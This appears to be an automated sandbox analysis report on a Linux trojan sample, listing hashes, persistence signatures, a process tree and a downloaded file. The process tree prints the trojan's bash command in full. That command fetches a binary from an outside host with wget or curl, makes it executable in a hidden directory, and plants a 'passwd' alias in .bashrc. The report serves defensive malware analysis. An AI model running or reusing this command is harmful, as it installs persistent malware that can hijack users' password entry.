Overview

overview

6

Static

static

1

SecuriteIn...69.elf

ubuntu-18.04-amd64

6

Analysis

  • max time kernel
    1s
  • max time network
    128s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240226-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    08/04/2024, 14:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf

  • Size

    912KB

  • MD5

    c4f9285f7b3396fedc9b544ad7ffd8b6

  • SHA1

    7d39a65e46e7c82f9544359410cc6a6d9c0de3a5

  • SHA256

    2acdc5c966113362906baebd720448324078c9855bc43ad8365c04b8e0064b36

  • SHA512

    47c1b2816df3d286430b713331e990efe19500a1c007c246908c42d4c63c0168f60c08dc47878b78f78887fa691140f288a0df681af3b3d07ab7ae46b7897a19

  • SSDEEP

    12288:IwspmaU6XxlWH4dxWk/sGjeQ60tzeBC9myy8bkklOSUZgw3:IwspdXxlWH4dsk/sGje10t6nkkDZgw

Score
6/10
persistence

Malware Config

Signatures

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

    persistence
  • Modifies Bash startup script 1 TTPs 1 IoCs
    persistence
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
    /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
    1⤵
      PID:1544
    • /bin/bash
      /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf -c "exec '/tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf' \"\$@\"" /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
      1⤵
        PID:1544
      • /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
        /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
        1⤵
          PID:1544
        • /bin/bash
          /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf -c " #!/bin/bash mkdir /var/tmp/.ssh cd /var/tmp/.ssh wget -q -P /var/tmp/.ssh vvnnmm.com/d/sshdr || curl -s -O vvnnmm.com/d/s > /var/tmp/.ssh/sshdr chmod +x /var/tmp/.ssh/sshdr x=\$(pwd) echo \"alias passwd='\$x/sshdr'\" >> ~/.bashrc source ~/.bashrc" /tmp/SecuriteInfo.com.Trojan.Linux.Agent.14727.28069.elf
          1⤵
          • Creates/modifies environment variables
          • Modifies Bash startup script
          PID:1544
          • /bin/mkdir
            mkdir /var/tmp/.ssh
            2⤵
            • Reads runtime system information
            PID:1545
          • /usr/bin/wget
            wget -q -P /var/tmp/.ssh vvnnmm.com/d/sshdr
            2⤵
              PID:1546
            • /bin/chmod
              chmod +x /var/tmp/.ssh/sshdr
              2⤵
                PID:1550

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /var/tmp/.ssh/sshdr
              Filesize

              4.7MB

              MD5

              e357e0385e8b38af9695ffcfc44e25e8

              SHA1

              e32bbc56d5d2b94c2beccbc7ada0099e27c1d522

              SHA256

              32607f29b2e470a5b5f6c73a1f14eb874a140e61246e7b5b926bf10478b2a3f4

              SHA512

              2c279096a88e50641492bf5ab98c112b6f5615ac24010784b477d0133a0d4919e3d3528b22d3ef067745fa96834b5631d9a4513337cccc5653c28adcb018c55e

              Download Submit